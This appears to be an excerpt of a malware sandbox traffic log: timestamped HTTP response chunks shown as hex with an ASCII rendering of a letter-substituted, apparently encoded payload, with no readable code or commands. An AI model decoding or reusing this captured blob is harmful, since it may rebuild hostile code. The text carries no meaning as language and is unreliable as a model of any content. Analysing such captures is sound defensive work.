                                                                                                Data Ascii: U TOg MMU MTO gS MgP TSS pP gM UO TOS TOT TSO MSO Mig MiT TMP Tnp TMg TiU TSP TOn TgM O TSO TSi Tn TnP Mgi gg TPn TpM TOg TiO MPM TOO TgS TOM TpM TO iP MU Tip Tn UO TnP TMM gp TOT MMU n TnS MTT MSP MiT MU MTU Oi PU TSO TPS Oi Tnn Ug MiT Pp MSO ng TPp Tgp
                                                                                                2021-10-26 15:35:14 UTC5471INData Raw: 54 69 20 4d 4f 20 54 55 4d 20 54 50 54 20 55 20 4d 67 55 20 54 55 50 20 55 6e 20 4d 4f 20 69 70 20 6e 20 4d 4d 67 20 69 69 20 54 69 50 20 4d 54 53 20 70 67 20 4d 4d 53 20 70 50 20 4d 67 4f 20 54 4f 53 20 55 20 70 54 20 69 70 20 53 20 54 4d 67 20 67 70 20 4f 53 20 69 54 20 4d 69 67 20 54 69 50 20 69 67 20 54 70 70 20 54 53 4d 20 69 69 20 4d 69 70 20 54 20 70 20 4d 67 20 70 6e 20 70 20 54 4f 4f 20 4d 53 70 20 54 67 67 20 54 50 53 20 67 6e 20 54 4f 53 20 54 55 6e 20 54 4d 4f 20 4d 67 50 20 67 6e 20 4d 69 53 20 54 53 4d 20 4d 53 20 4d 6e 20 54 67 69 20 69 20 67 4d 20 4d 54 69 20 4d 69 67 20 54 53 69 20 54 53 4f 20 4d 4d 4f 20 54 53 50 20 4d 67 67 20 69 69 20 4d 69 50 20 54 55 20 54 4d 50 20 4d 50 50 20 4d 50 20 54 4f 55 20 54 4f 54 20 54 55 4d 20 54 4d 4d 20
                                                                                                Data Ascii: Ti MO TUM TPT U MgU TUP Un MO ip n MMg ii TiP MTS pg MMS pP MgO TOS U pT ip S TMg gp OS iT Mig TiP ig Tpp TSM ii Mip T p Mg pn p TOO MSp Tgg TPS gn TOS TUn TMO MgP gn MiS TSM MS Mn Tgi i gM MTi Mig TSi TSO MMO TSP Mgg ii MiP TU TMP MPP MP TOU TOT TUM TMM
                                                                                                2021-10-26 15:35:14 UTC5487INData Raw: 4d 50 20 54 67 67 20 50 6e 20 54 4d 50 20 4d 53 70 20 70 54 20 53 20 55 4f 20 4d 54 67 20 4d 69 54 20 6e 53 20 4d 67 69 20 55 4d 20 54 6e 4d 20 54 50 50 20 54 4f 4d 20 4d 54 4f 20 54 69 67 20 54 50 54 20 54 4f 6e 20 4f 70 20 55 50 20 54 20 4d 69 53 20 69 6e 20 54 67 4d 20 50 70 20 4d 4d 6e 20 4d 55 20 54 6e 69 20 4d 54 55 20 54 54 4d 20 4d 4d 67 20 4f 6e 20 4d 67 20 69 54 20 54 50 4f 20 4d 4d 4d 20 54 4d 69 20 54 70 4d 20 4d 67 50 20 54 69 55 20 54 53 69 20 4d 67 6e 20 4d 4d 4f 20 54 67 4d 20 4d 55 20 69 54 20 6e 55 20 54 4d 4f 20 4d 53 70 20 54 54 69 20 6e 4f 20 54 20 54 4d 69 20 67 4d 20 4d 4d 4d 20 70 4d 20 4d 50 4d 20 54 54 69 20 67 69 20 55 50 20 4f 69 20 67 4f 20 4d 4d 54 20 54 6e 70 20 6e 4f 20 4d 54 4d 20 4d 69 4d 20 54 54 69 20 54 6e 4d 20 70 70
                                                                                                Data Ascii: MP Tgg Pn TMP MSp pT S UO MTg MiT nS Mgi UM TnM TPP TOM MTO Tig TPT TOn Op UP T MiS in TgM Pp MMn MU Tni MTU TTM MMg On Mg iT TPO MMM TMi TpM MgP TiU TSi Mgn MMO TgM MU iT nU TMO MSp TTi nO T TMi gM MMM pM MPM TTi gi UP Oi gO MMT Tnp nO MTM MiM TTi TnM pp
                                                                                                2021-10-26 15:35:14 UTC5503INData Raw: 6e 20 55 4d 20 69 53 20 54 4d 67 20 69 4d 20 4d 54 55 20 67 6e 20 54 4f 50 20 54 4d 4f 20 54 55 20 6e 54 20 4d 69 54 20 70 70 20 54 55 6e 20 4d 69 67 20 55 53 20 54 69 4d 20 4d 4d 53 20 54 4f 53 20 4d 4d 69 20 67 6e 20 69 67 20 67 50 20 4d 50 69 20 4d 67 55 20 6e 67 20 54 67 20 4d 55 20 50 4f 20 54 4f 53 20 67 4d 20 4d 69 54 20 4d 4d 69 20 4d 69 6e 20 55 50 20 55 69 20 4d 54 53 20 67 4f 20 4d 53 67 20 69 4d 20 4d 54 53 20 70 6e 20 54 55 53 20 54 54 6e 20 69 54 20 4d 69 55 20 4d 69 4f 20 54 67 20 54 69 55 20 6e 54 20 54 67 69 20 4f 4d 20 6e 50 20 54 53 4f 20 4f 67 20 54 6e 67 20 54 70 53 20 4d 69 50 20 54 69 67 20 4d 69 55 20 4d 50 4d 20 54 4f 55 20 54 53 53 20 4f 20 67 67 20 54 69 6e 20 69 69 20 4d 55 20 54 69 69 20 4f 69 20 4d 54 4d 20 4d 53 4d 20 4d 54
                                                                                                Data Ascii: n UM iS TMg iM MTU gn TOP TMO TU nT MiT pp TUn Mig US TiM MMS TOS MMi gn ig gP MPi MgU ng Tg MU PO TOS gM MiT MMi Min UP Ui MTS gO MSg iM MTS pn TUS TTn iT MiU MiO Tg TiU nT Tgi OM nP TSO Og Tng TpS MiP Tig MiU MPM TOU TSS O gg Tin ii MU Tii Oi MTM MSM MT
                                                                                                2021-10-26 15:35:14 UTC5519INData Raw: 67 4f 20 54 69 6e 20 4f 4d 20 67 4d 20 4d 4d 20 54 4d 55 20 54 6e 6e 20 54 50 20 54 70 4f 20 54 50 67 20 4d 69 70 20 54 55 50 20 4d 53 70 20 54 50 69 20 54 54 4d 20 55 4f 20 4d 69 70 20 6e 70 20 50 6e 20 4d 53 50 20 4d 4d 4d 20 54 50 4d 20 54 4f 67 20 4d 50 4d 20 67 6e 20 4f 54 20 4d 53 70 20 70 54 20 70 4d 20 54 55 20 54 6e 20 55 53 20 67 67 20 4d 69 70 20 4d 54 54 20 4d 53 4f 20 4d 67 67 20 4d 53 67 20 54 53 53 20 54 4d 53 20 4d 53 69 20 54 6e 6e 20 54 69 54 20 54 53 4d 20 54 53 55 20 4d 69 6e 20 54 55 50 20 54 55 55 20 54 4d 20 6e 20 4d 50 50 20 67 53 20 69 4d 20 4d 67 54 20 4f 55 20 4d 50 54 20 54 6e 4d 20 4d 50 20 54 55 4f 20 70 54 20 4d 69 50 20 4d 67 53 20 54 50 6e 20 50 4f 20 54 69 55 20 4d 69 53 20 54 70 4d 20 54 67 20 54 4d 53 20 4d 53 53 20 4d
                                                                                                Data Ascii: gO Tin OM gM MM TMU Tnn TP TpO TPg Mip TUP MSp TPi TTM UO Mip np Pn MSP MMM TPM TOg MPM gn OT MSp pT pM TU Tn US gg Mip MTT MSO Mgg MSg TSS TMS MSi Tnn TiT TSM TSU Min TUP TUU TM n MPP gS iM MgT OU MPT TnM MP TUO pT MiP MgS TPn PO TiU MiS TpM Tg TMS MSS M
                                                                                                2021-10-26 15:35:14 UTC5535INData Raw: 4f 20 4f 20 55 53 20 54 4f 55 20 54 69 6e 20 54 69 54 20 67 55 20 54 4f 53 20 54 50 4d 20 4d 54 50 20 54 55 55 20 4f 4f 20 55 55 20 70 20 4d 67 4f 20 54 70 4d 20 54 4d 54 20 4d 54 20 69 20 6e 4f 20 54 70 55 20 6e 50 20 54 50 54 20 55 70 20 54 70 54 20 54 50 55 20 54 55 70 20 4d 53 6e 20 54 53 55 20 54 4d 4f 20 54 54 50 20 54 54 6e 20 55 55 20 67 53 20 4f 4f 20 54 67 67 20 6e 20 50 20 4d 54 53 20 67 53 20 6e 54 20 54 67 4f 20 4d 53 54 20 54 50 50 20 54 53 69 20 4d 4d 67 20 69 50 20 67 4d 20 54 4d 55 20 54 55 6e 20 54 4d 20 54 53 54 20 54 6e 67 20 54 69 4f 20 55 67 20 54 50 6e 20 54 4f 20 54 4d 4f 20 69 20 54 55 4d 20 50 20 69 6e 20 54 70 20 4d 54 20 54 6e 50 20 4d 67 67 20 4d 69 54 20 54 4f 70 20 4d 69 53 20 54 4f 20 50 6e 20 50 20 50 69 20 54 69 6e 20 50
                                                                                                Data Ascii: O O US TOU Tin TiT gU TOS TPM MTP TUU OO UU p MgO TpM TMT MT i nO TpU nP TPT Up TpT TPU TUp MSn TSU TMO TTP TTn UU gS OO Tgg n P MTS gS nT TgO MST TPP TSi MMg iP gM TMU TUn TM TST Tng TiO Ug TPn TO TMO i TUM P in Tp MT TnP Mgg MiT TOp MiS TO Pn P Pi Tin P
                                                                                                2021-10-26 15:35:14 UTC5551INData Raw: 20 50 69 20 4d 69 69 20 4d 67 53 20 4d 69 4f 20 4d 53 55 20 54 6e 50 20 54 55 53 20 4d 4d 53 20 67 54 20 54 69 6e 20 54 53 20 4d 67 20 4f 54 20 70 4d 20 4f 53 20 4d 67 50 20 50 50 20 54 55 53 20 67 20 54 4f 55 20 4d 4d 6e 20 54 53 6e 20 4d 50 67 20 4d 4d 50 20 4f 6e 20 6e 4f 20 54 50 69 20 4d 53 4d 20 54 70 55 20 54 53 53 20 54 4d 20 54 69 67 20 4d 67 6e 20 54 69 54 20 54 54 55 20 54 6e 67 20 4d 69 54 20 69 69 20 4d 4d 4f 20 54 69 4f 20 55 4d 20 4d 69 70 20 50 6e 20 67 55 20 54 53 20 54 53 69 20 54 54 69 20 54 70 70 20 54 53 6e 20 54 53 4d 20 4d 54 50 20 54 6e 69 20 69 55 20 67 20 70 54 20 6e 6e 20 69 20 54 4f 55 20 55 4f 20 54 53 6e 20 55 6e 20 6e 50 20 54 70 69 20 6e 53 20 4d 53 54 20 6e 4f 20 54 67 4d 20 69 6e 20 70 4f 20 4d 53 67 20 54 6e 50 20 54 50
                                                                                                Data Ascii: Pi Mii MgS MiO MSU TnP TUS MMS gT Tin TS Mg OT pM OS MgP PP TUS g TOU MMn TSn MPg MMP On nO TPi MSM TpU TSS TM Tig Mgn TiT TTU Tng MiT ii MMO TiO UM Mip Pn gU TS TSi TTi Tpp TSn TSM MTP Tni iU g pT nn i TOU UO TSn Un nP Tpi nS MST nO TgM in pO MSg TnP TP
                                                                                                2021-10-26 15:35:14 UTC5567INData Raw: 69 20 69 50 20 4d 67 50 20 4d 55 20 4d 53 20 4d 67 50 20 4d 69 54 20 4d 67 69 20 54 6e 53 20 54 53 4d 20 54 53 70 20 54 6e 50 20 54 4f 4d 20 4d 67 69 20 54 4f 55 20 4d 50 67 20 54 4f 4d 20 54 70 6e 20 67 69 20 4d 53 20 54 54 70 20 6e 6e 20 4d 4d 6e 20 54 55 69 20 54 67 20 55 67 20 6e 70 20 69 4f 20 54 53 70 20 54 50 50 20 54 70 55 20 4d 4d 4d 20 54 69 20 67 4f 20 4d 54 4d 20 4f 69 20 70 50 20 4d 4d 20 4f 55 20 4d 54 4d 20 50 50 20 70 54 20 54 55 67 20 54 54 69 20 54 50 70 20 54 50 53 20 6e 69 20 4d 69 20 50 70 20 54 54 50 20 4d 53 69 20 54 55 4f 20 50 4d 20 55 20 4f 4d 20 4d 53 20 55 4f 20 4d 67 54 20 54 54 67 20 54 67 67 20 4d 54 6e 20 4d 69 67 20 54 55 54 20 54 53 53 20 54 4d 69 20 70 50 20 54 4d 4f 20 54 6e 53 20 55 53 20 4d 50 67 20 54 69 50 20 54 6e
                                                                                                Data Ascii: i iP MgP MU MS MgP MiT Mgi TnS TSM TSp TnP TOM Mgi TOU MPg TOM Tpn gi MS TTp nn MMn TUi Tg Ug np iO TSp TPP TpU MMM Ti gO MTM Oi pP MM OU MTM PP pT TUg TTi TPp TPS ni Mi Pp TTP MSi TUO PM U OM MS UO MgT TTg Tgg MTn Mig TUT TSS TMi pP TMO TnS US MPg TiP Tn
                                                                                                2021-10-26 15:35:14 UTC5583INData Raw: 55 70 20 69 6e 20 4d 70 20 67 50 20 54 69 54 20 4d 67 4f 20 54 6e 4d 20 67 70 20 55 55 20 54 67 67 20 4d 20 70 4f 20 4d 50 20 4d 67 54 20 54 54 55 20 4d 69 69 20 54 55 6e 20 4d 67 70 20 4d 67 54 20 54 54 20 4d 54 67 20 4f 67 20 4d 54 4f 20 67 50 20 67 6e 20 54 69 70 20 54 69 4d 20 4d 69 55 20 70 4d 20 54 70 20 54 55 6e 20 4f 67 20 4d 67 4f 20 50 55 20 4f 54 20 4d 4d 4d 20 4d 54 54 20 54 54 4f 20 54 4d 55 20 54 67 50 20 54 54 6e 20 54 69 54 20 54 70 50 20 70 4d 20 4d 69 70 20 69 50 20 50 70 20 70 70 20 54 53 53 20 54 6e 70 20 55 70 20 67 67 20 4d 67 69 20 54 4f 69 20 67 4d 20 4d 69 4d 20 67 67 20 6e 67 20 54 6e 6e 20 54 53 6e 20 54 20 67 20 54 4d 4d 20 53 20 54 54 54 20 4d 54 55 20 6e 4d 20 54 50 53 20 54 50 69 20 69 70 20 6e 67 20 54 67 4f 20 54 54 50 20
                                                                                                Data Ascii: Up in Mp gP TiT MgO TnM gp UU Tgg M pO MP MgT TTU Mii TUn Mgp MgT TT MTg Og MTO gP gn Tip TiM MiU pM Tp TUn Og MgO PU OT MMM MTT TTO TMU TgP TTn TiT TpP pM Mip iP Pp pp TSS Tnp Up gg Mgi TOi gM MiM gg ng Tnn TSn T g TMM S TTT MTU nM TPS TPi ip ng TgO TTP
                                                                                                2021-10-26 15:35:14 UTC5599INData Raw: 4d 69 70 20 54 6e 69 20 69 55 20 54 50 50 20 70 54 20 54 55 69 20 54 69 67 20 70 54 20 4d 4d 70 20 54 67 67 20 54 4f 20 54 4d 54 20 54 53 50 20 55 4d 20 69 70 20 69 70 20 54 4d 4d 20 67 70 20 69 4d 20 4d 67 55 20 54 70 53 20 4f 4f 20 50 55 20 54 4f 4d 20 54 4f 67 20 54 6e 54 20 54 4d 50 20 50 55 20 54 53 53 20 4d 67 69 20 54 54 70 20 4d 4f 20 54 69 50 20 67 54 20 54 50 53 20 54 50 69 20 54 6e 6e 20 54 4d 67 20 69 55 20 54 55 55 20 4d 50 67 20 4f 69 20 4d 50 4d 20 4d 53 67 20 54 6e 6e 20 54 70 4f 20 50 4d 20 54 50 20 4f 69 20 6e 6e 20 4d 54 4f 20 54 54 70 20 54 4f 6e 20 54 70 4d 20 6e 69 20 54 69 20 54 53 70 20 4f 50 20 54 55 4f 20 4f 20 50 55 20 54 4f 4f 20 55 69 20 54 70 4d 20 54 70 4d 20 54 69 4f 20 4d 50 67 20 69 4f 20 54 70 67 20 54 4d 53 20 4d 67 50
                                                                                                Data Ascii: Mip Tni iU TPP pT TUi Tig pT MMp Tgg TO TMT TSP UM ip ip TMM gp iM MgU TpS OO PU TOM TOg TnT TMP PU TSS Mgi TTp MO TiP gT TPS TPi Tnn TMg iU TUU MPg Oi MPM MSg Tnn TpO PM TP Oi nn MTO TTp TOn TpM ni Ti TSp OP TUO O PU TOO Ui TpM TpM TiO MPg iO Tpg TMS MgP
                                                                                                2021-10-26 15:35:14 UTC5615INData Raw: 67 4f 20 54 50 54 20 54 55 54 20 4d 67 6e 20 54 67 6e 20 54 70 55 20 69 69 20 4d 4d 6e 20 54 55 67 20 54 54 69 20 54 4f 53 20 4d 53 55 20 67 50 20 4d 53 4d 20 54 4f 54 20 54 55 6e 20 6e 67 20 54 54 50 20 4d 67 6e 20 69 69 20 54 4f 67 20 54 69 54 20 54 4d 6e 20 54 6e 69 20 54 69 50 20 4d 50 54 20 54 50 70 20 54 20 54 70 69 20 67 54 20 54 53 4f 20 54 69 54 20 54 54 20 4d 50 54 20 4d 53 4d 20 54 69 69 20 4d 69 53 20 54 6e 54 20 55 54 20 54 69 4d 20 6e 20 4d 55 20 70 4f 20 4d 50 54 20 4f 4d 20 54 67 70 20 54 4f 69 20 54 4d 6e 20 55 4d 20 54 54 6e 20 70 54 20 55 20 54 50 69 20 4d 4d 54 20 54 69 50 20 54 4f 4f 20 54 50 54 20 4d 4d 4f 20 54 4f 54 20 4d 69 70 20 54 67 50 20 54 55 55 20 54 6e 6e 20 54 4d 4f 20 54 54 4d 20 54 53 4d 20 4d 67 6e 20 54 53 53 20 54 53
                                                                                                Data Ascii: gO TPT TUT Mgn Tgn TpU ii MMn TUg TTi TOS MSU gP MSM TOT TUn ng TTP Mgn ii TOg TiT TMn Tni TiP MPT TPp T Tpi gT TSO TiT TT MPT MSM Tii MiS TnT UT TiM n MU pO MPT OM Tgp TOi TMn UM TTn pT U TPi MMT TiP TOO TPT MMO TOT Mip TgP TUU Tnn TMO TTM TSM Mgn TSS TS
                                                                                                2021-10-26 15:35:14 UTC5631INData Raw: 55 20 4f 50 20 4d 53 70 20 69 20 54 4d 6e 20 54 70 67 20 54 6e 55 20 4d 54 70 20 4d 4d 69 20 4d 53 50 20 4d 69 55 20 4d 53 55 20 54 53 4f 20 69 6e 20 4f 4d 20 54 50 6e 20 4d 67 69 20 4d 4d 55 20 54 67 70 20 54 4d 20 54 6e 6e 20 4d 4d 70 20 4d 50 69 20 4d 53 50 20 4d 54 4d 20 4d 69 4f 20 54 55 6e 20 54 53 67 20 4d 50 54 20 54 4d 54 20 4f 70 20 4f 55 20 4d 4d 53 20 4d 50 53 20 54 53 67 20 54 50 55 20 4f 70 20 67 6e 20 54 55 70 20 54 53 20 50 4d 20 54 67 50 20 67 50 20 54 67 67 20 54 4f 4d 20 54 55 69 20 54 4d 53 20 67 4f 20 54 69 55 20 4d 50 50 20 54 70 6e 20 54 4f 20 4d 53 67 20 54 4d 4d 20 6e 70 20 67 4f 20 4f 54 20 4d 53 50 20 54 50 55 20 54 50 6e 20 54 53 67 20 54 55 50 20 67 6e 20 54 50 4d 20 4d 4d 6e 20 54 53 53 20 54 67 4d 20 4d 55 20 6e 53 20 4d 4d
                                                                                                Data Ascii: U OP MSp i TMn Tpg TnU MTp MMi MSP MiU MSU TSO in OM TPn Mgi MMU Tgp TM Tnn MMp MPi MSP MTM MiO TUn TSg MPT TMT Op OU MMS MPS TSg TPU Op gn TUp TS PM TgP gP Tgg TOM TUi TMS gO TiU MPP Tpn TO MSg TMM np gO OT MSP TPU TPn TSg TUP gn TPM MMn TSS TgM MU nS MM
                                                                                                2021-10-26 15:35:14 UTC5647INData Raw: 6e 20 54 4d 4f 20 4d 4d 6e 20 70 53 20 4d 4d 4d 20 54 4d 53 20 54 70 20 54 70 54 20 4f 4d 20 6e 53 20 4d 67 55 20 54 70 55 20 4d 53 55 20 54 69 67 20 4d 69 6e 20 54 4f 69 20 4d 4d 4d 20 54 54 4f 20 4d 69 67 20 4d 4d 70 20 54 53 53 20 54 20 54 67 55 20 54 55 20 70 4f 20 54 50 70 20 50 53 20 54 55 69 20 4d 67 4d 20 4d 69 6e 20 69 53 20 54 69 50 20 54 6e 6e 20 4d 4d 50 20 70 54 20 4d 67 50 20 69 54 20 4d 69 69 20 55 20 54 67 69 20 4d 70 20 54 55 69 20 54 54 54 20 54 70 69 20 50 4d 20 54 4d 69 20 54 6e 69 20 50 20 54 69 70 20 70 6e 20 4d 55 20 54 53 50 20 4d 67 50 20 54 70 67 20 54 6e 50 20 54 6e 70 20 54 70 4f 20 54 4f 6e 20 54 53 50 20 4d 4d 4f 20 54 55 4f 20 54 69 53 20 54 50 67 20 67 54 20 4d 53 50 20 54 50 70 20 50 70 20 6e 53 20 54 50 67 20 54 67 6e 20
                                                                                                Data Ascii: n TMO MMn pS MMM TMS Tp TpT OM nS MgU TpU MSU Tig Min TOi MMM TTO Mig MMp TSS T TgU TU pO TPp PS TUi MgM Min iS TiP Tnn MMP pT MgP iT Mii U Tgi Mp TUi TTT Tpi PM TMi Tni P Tip pn MU TSP MgP Tpg TnP Tnp TpO TOn TSP MMO TUO TiS TPg gT MSP TPp Pp nS TPg Tgn
                                                                                                2021-10-26 15:35:14 UTC5663INData Raw: 53 70 20 54 70 67 20 4f 70 20 4d 67 4f 20 4d 54 67 20 70 69 20 50 53 20 54 67 55 20 54 70 70 20 4f 4f 20 54 4d 55 20 54 4d 6e 20 4d 67 70 20 4d 67 4f 20 4d 53 70 20 4d 53 69 20 54 6e 70 20 55 54 20 6e 69 20 54 6e 6e 20 69 20 54 53 4f 20 4d 67 6e 20 54 54 54 20 4d 54 70 20 4d 54 70 20 54 69 67 20 54 4f 67 20 4d 53 20 54 67 6e 20 70 20 4d 4d 20 4d 69 55 20 54 50 6e 20 4d 50 20 54 70 69 20 54 70 4d 20 54 6e 50 20 4d 53 50 20 70 67 20 4f 67 20 6e 55 20 69 4f 20 4f 69 20 54 70 54 20 4d 54 4d 20 4d 67 4d 20 54 70 69 20 4d 67 20 6e 55 20 4d 54 55 20 70 4f 20 54 50 67 20 54 53 67 20 4d 54 50 20 54 69 4d 20 4d 53 50 20 55 54 20 54 67 20 54 54 53 20 54 4f 54 20 54 54 50 20 6e 20 4d 54 54 20 70 54 20 54 69 69 20 4f 55 20 54 50 20 54 6e 55 20 69 4d 20 67 4d 20 4d 67
                                                                                                Data Ascii: Sp Tpg Op MgO MTg pi PS TgU Tpp OO TMU TMn Mgp MgO MSp MSi Tnp UT ni Tnn i TSO Mgn TTT MTp MTp Tig TOg MS Tgn p MM MiU TPn MP Tpi TpM TnP MSP pg Og nU iO Oi TpT MTM MgM Tpi Mg nU MTU pO TPg TSg MTP TiM MSP UT Tg TTS TOT TTP n MTT pT Tii OU TP TnU iM gM Mg
                                                                                                2021-10-26 15:35:14 UTC5679INData Raw: 54 55 20 6e 55 20 54 67 55 20 4d 69 55 20 54 55 69 20 4d 50 50 20 69 50 20 4d 4d 53 20 55 67 20 4d 69 53 20 54 69 55 20 54 67 6e 20 54 69 54 20 4f 70 20 6e 4f 20 6e 54 20 4d 4d 67 20 6e 70 20 4d 69 4d 20 54 4f 50 20 54 54 54 20 50 69 20 54 70 4f 20 50 55 20 54 6e 6e 20 54 69 55 20 54 69 70 20 54 53 69 20 55 50 20 55 54 20 4d 69 70 20 6e 4f 20 50 67 20 4d 53 67 20 55 4f 20 4d 54 4f 20 4d 67 67 20 54 54 70 20 54 55 50 20 4d 4d 4f 20 54 53 67 20 54 69 20 6e 55 20 54 67 54 20 4d 4d 53 20 54 69 69 20 69 67 20 54 67 70 20 4d 4d 54 20 54 6e 53 20 67 70 20 50 50 20 54 6e 20 54 50 20 54 53 20 54 69 54 20 54 6e 6e 20 4d 67 4f 20 4d 69 55 20 54 4f 4d 20 54 50 55 20 54 4d 50 20 54 6e 69 20 54 50 54 20 54 4f 4f 20 4d 54 6e 20 54 6e 67 20 54 4f 69 20 70 55 20 54 69 20
                                                                                                Data Ascii: TU nU TgU MiU TUi MPP iP MMS Ug MiS TiU Tgn TiT Op nO nT MMg np MiM TOP TTT Pi TpO PU Tnn TiU Tip TSi UP UT Mip nO Pg MSg UO MTO Mgg TTp TUP MMO TSg Ti nU TgT MMS Tii ig Tgp MMT TnS gp PP Tn TP TS TiT Tnn MgO MiU TOM TPU TMP Tni TPT TOO MTn Tng TOi pU Ti
                                                                                                2021-10-26 15:35:14 UTC5695INData Raw: 4d 67 4d 20 54 6e 4f 20 54 70 55 20 4d 54 53 20 54 55 4f 20 67 54 20 50 4d 20 54 4d 67 20 54 67 20 4d 54 4d 20 54 4f 4d 20 69 20 70 69 20 54 70 67 20 4d 54 69 20 54 69 6e 20 54 4d 53 20 54 54 55 20 54 54 70 20 6e 55 20 6e 54 20 54 67 67 20 54 55 20 67 53 20 50 69 20 70 69 20 54 55 55 20 54 67 4d 20 54 54 4f 20 54 70 6e 20 54 50 54 20 54 53 67 20 4d 67 53 20 4d 50 53 20 4d 53 67 20 54 69 69 20 67 69 20 6e 6e 20 69 4d 20 4d 54 53 20 6e 70 20 4d 69 4d 20 54 69 4d 20 4d 69 4f 20 4f 54 20 4d 50 53 20 4d 54 67 20 4d 67 54 20 6e 50 20 6e 67 20 54 50 69 20 54 6e 55 20 54 67 55 20 54 70 20 69 50 20 69 50 20 4d 4d 20 54 55 70 20 54 70 50 20 54 53 69 20 4d 4d 4d 20 50 53 20 54 69 67 20 54 67 54 20 4d 69 50 20 54 69 54 20 54 53 6e 20 67 50 20 4d 53 54 20 54 55 54 20
                                                                                                Data Ascii: MgM TnO TpU MTS TUO gT PM TMg Tg MTM TOM i pi Tpg MTi Tin TMS TTU TTp nU nT Tgg TU gS Pi pi TUU TgM TTO Tpn TPT TSg MgS MPS MSg Tii gi nn iM MTS np MiM TiM MiO OT MPS MTg MgT nP ng TPi TnU TgU Tp iP iP MM TUp TpP TSi MMM PS Tig TgT MiP TiT TSn gP MST TUT
                                                                                                2021-10-26 15:35:14 UTC5711INData Raw: 20 54 55 20 54 67 69 20 55 6e 20 4d 67 69 20 50 4f 20 54 4d 67 20 54 4d 70 20 54 55 20 4d 69 53 20 50 54 20 55 67 20 54 4f 69 20 54 4f 70 20 54 53 55 20 6e 69 20 4d 54 55 20 54 4f 4d 20 4d 53 6e 20 50 53 20 54 4f 20 4d 69 70 20 4d 20 54 4f 53 20 4d 4d 69 20 54 50 4f 20 6e 4f 20 4d 4d 55 20 54 53 20 55 4d 20 6e 55 20 6e 50 20 54 67 70 20 54 70 50 20 6e 20 6e 70 20 54 53 53 20 50 50 20 55 4f 20 67 6e 20 4d 67 4f 20 54 4f 67 20 4f 70 20 67 53 20 54 67 54 20 54 4d 4d 20 54 4d 55 20 4d 67 69 20 6e 55 20 54 50 54 20 70 20 54 6e 69 20 55 54 20 4f 20 55 20 69 20 6e 54 20 70 55 20 69 6e 20 4d 4d 6e 20 54 69 50 20 50 4d 20 54 50 67 20 69 70 20 54 50 20 4d 69 6e 20 54 70 67 20 67 20 54 55 67 20 54 69 50 20 54 69 67 20 4d 53 53 20 54 54 54 20 54 4f 4f 20 69 20 4d 67
                                                                                                Data Ascii: TU Tgi Un Mgi PO TMg TMp TU MiS PT Ug TOi TOp TSU ni MTU TOM MSn PS TO Mip M TOS MMi TPO nO MMU TS UM nU nP Tgp TpP n np TSS PP UO gn MgO TOg Op gS TgT TMM TMU Mgi nU TPT p Tni UT O U i nT pU in MMn TiP PM TPg ip TP Min Tpg g TUg TiP Tig MSS TTT TOO i Mg
                                                                                                2021-10-26 15:35:14 UTC5727INData Raw: 20 4d 4d 50 20 54 70 54 20 54 50 54 20 4d 53 54 20 54 4d 20 54 69 4f 20 4f 20 69 53 20 67 67 20 70 70 20 67 70 20 54 69 4d 20 6e 55 20 4f 70 20 4f 55 20 55 54 20 4d 69 20 4d 54 4d 20 4d 53 53 20 54 67 4f 20 54 50 6e 20 4f 20 6e 20 69 67 20 55 67 20 4d 54 53 20 6e 6e 20 67 4d 20 54 20 54 69 55 20 54 50 69 20 54 4d 4d 20 54 55 55 20 55 70 20 54 67 4d 20 54 55 4f 20 50 70 20 67 55 20 54 69 20 55 69 20 54 54 53 20 4d 4d 53 20 54 54 53 20 54 67 4f 20 54 4f 67 20 54 50 4f 20 4d 69 4d 20 54 70 67 20 54 4d 55 20 4d 53 4f 20 4d 53 20 54 70 69 20 54 53 54 20 54 67 4d 20 4d 53 6e 20 54 69 6e 20 4d 53 20 54 4d 53 20 4d 69 70 20 54 70 54 20 4d 67 4f 20 50 4d 20 4d 67 67 20 4d 53 67 20 6e 20 4d 69 53 20 54 70 54 20 54 4d 67 20 4f 6e 20 4d 54 69 20 4d 4d 67 20 54 4f 50
                                                                                                Data Ascii: MMP TpT TPT MST TM TiO O iS gg pp gp TiM nU Op OU UT Mi MTM MSS TgO TPn O n ig Ug MTS nn gM T TiU TPi TMM TUU Up TgM TUO Pp gU Ti Ui TTS MMS TTS TgO TOg TPO MiM Tpg TMU MSO MS Tpi TST TgM MSn Tin MS TMS Mip TpT MgO PM Mgg MSg n MiS TpT TMg On MTi MMg TOP
                                                                                                2021-10-26 15:35:14 UTC5731INData Raw: 20 4d 53 4d 20 55 53 20 50 53 20 4d 53 4f 20 54 69 20 4d 4d 4f 20 55 50 20 4d 50 20 4d 55 20 54 53 54 20 67 4f 20 6e 50 20 54 69 70 20 54 6e 70 20 70 4d 20 67 53 20 54 53 50 20 54 55 4f 20 4d 67 50 20 54 54 53 20 4f 54 20 54 55 53 20 54 70 69 20 4d 67 55 20 54 70 6e 20 4d 67 54 20 4d 69 67 20 4d 53 6e 20 4d 54 6e 20 54 69 70 20 67 54 20 54 69 4f 20 54 4d 69 20 4d 50 50 20 54 54 4f 20 54 70 53 20 54 6e 53 20 54 4f 70 20 4d 50 67 20 4d 69 4f 20 4f 67 20 6e 50 20 54 55 55 20 54 53 54 20 54 55 6e 20 4d 67 50 20 6e 55 20 54 69 69 20 54 67 6e 20 54 54 4f 20 54 6e 4f 20 4d 53 4f 20 54 4f 69 20 4f 53 20 4d 50 69 20 4d 67 70 20 4f 4d 20 54 50 53 20 50 6e 20 50 20 54 55 67 20 50 6e 20 4f 50 20 54 67 69 20 54 6e 6e 20 54 4f 50 20 4d 67 67 20 54 4f 4d 20 69 67 20 54
                                                                                                Data Ascii: MSM US PS MSO Ti MMO UP MP MU TST gO nP Tip Tnp pM gS TSP TUO MgP TTS OT TUS Tpi MgU Tpn MgT Mig MSn MTn Tip gT TiO TMi MPP TTO TpS TnS TOp MPg MiO Og nP TUU TST TUn MgP nU Tii Tgn TTO TnO MSO TOi OS MPi Mgp OM TPS Pn P TUg Pn OP Tgi Tnn TOP Mgg TOM ig T
